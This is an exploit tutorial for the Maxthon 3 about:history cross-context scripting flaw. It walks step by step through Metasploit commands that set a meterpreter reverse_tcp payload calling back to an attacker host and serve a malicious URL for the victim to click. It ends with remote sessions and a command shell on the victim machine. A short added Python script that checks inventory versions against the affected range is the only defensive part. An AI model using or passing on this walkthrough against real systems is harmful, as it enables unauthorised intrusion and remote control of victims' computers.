Maxthon3 about:history XCS Trusted Zone Code Execution
Cross Context Scripting (XCS) is possible in the Maxthon about:history page. Injection into such a privileged/trusted browser zone can be used to modify configuration settings and execute arbitrary commands. Please note this module only works against specific versions of XCS. Currently, it has only been successfully tested on Maxthon 3.1.7 build 600 up to 3.2.2 build 1000.
Exploit Targets :
- 0 - Maxthon 3 (prior to 3.3) on Windows (default)
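For defenders, the version ranges quoted above can be turned into an inventory check. The following is an added example, not part of the original post or of the Metasploit module; the dotted four-part version string format, the host names and the sample inventory are assumptions constructed for illustration.

```python
import re

# Bounds taken from the page: tested on 3.1.7 build 600 up to 3.2.2 build 1000,
# target listed as "Maxthon 3 (prior to 3.3)".
# Assumption: versions are reported as "major.minor.patch.build".
TESTED_LOW = (3, 1, 7, 600)
TESTED_HIGH = (3, 2, 2, 1000)
FIXED_FROM = (3, 3)

def parse_version(text):
    """Return a 4-tuple of ints, or None if the string is not a version."""
    m = re.fullmatch(r"\s*(\d+)\.(\d+)(?:\.(\d+))?(?:\.(\d+))?\s*", text)
    if not m:
        return None
    # Missing patch/build fields are treated as 0.
    return tuple(int(g) if g is not None else 0 for g in m.groups())

def classify(text):
    """Classify one reported Maxthon version against the page's ranges."""
    v = parse_version(text)
    if v is None:
        return "unknown"            # needs manual follow-up
    if v[0] != 3:
        return "not-listed"         # the page only lists Maxthon 3
    if v[:2] >= FIXED_FROM:
        return "not-affected"       # 3.3 and later
    if TESTED_LOW <= v <= TESTED_HIGH:
        return "affected-tested"    # inside the range the module was tested on
    return "affected-untested"      # prior to 3.3, outside the tested range

def triage(inventory):
    """Map host name -> classification for a {host: version} inventory."""
    return {host: classify(ver) for host, ver in inventory.items()}

# Constructed sample inventory (hypothetical hosts and versions).
SAMPLE = {
    "ws-01": "3.1.7.600",
    "ws-02": "3.2.2.1000",
    "ws-03": "3.0.5.21",
    "ws-04": "3.3.2.600",
    "ws-05": "n/a",
    "ws-06": "4.0.0.2000",
}

if __name__ == "__main__":
    for host, status in sorted(triage(SAMPLE).items()):
        print(f"{host}: {status}")
```

Hosts reported as affected-tested or affected-untested should be upgraded to 3.3 or later; unknown entries need a manual check.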
Requirement :
Attacker : Backtrack
Victim : Windows
Step 1 : Open a terminal and type msfconsole to start the Metasploit Framework
Step 2 : use exploit/windows/browser/maxthon_history_xcs
Step 3 : set payload windows/meterpreter/reverse_tcp
Step 4 : show options
Step 5 : Set all the parameters
set SRVHOST 192.168.56.102 (IP Address of the Local Machine)
set URIPATH / (root Address)
set LHOST 192.168.56.102 (Host IP Address)
Step 6 : exploit
Now the reverse handler is started on 192.168.56.102:4444 (our host address) and the exploit is served at the URL http://192.168.56.102:8080/. We have to send this URL to the victim machine; as soon as the victim clicks on the URL, we get the meterpreter sessions. Here we get two meterpreter sessions. Let's check this with the command sessions -l, which shows a list of all the active sessions.
Now type sessions -i 1 to interact with the meterpreter session. The sysinfo command gives us information about the remote system. Now type shell to get into the remote system.
And now we have the command prompt of the remote system.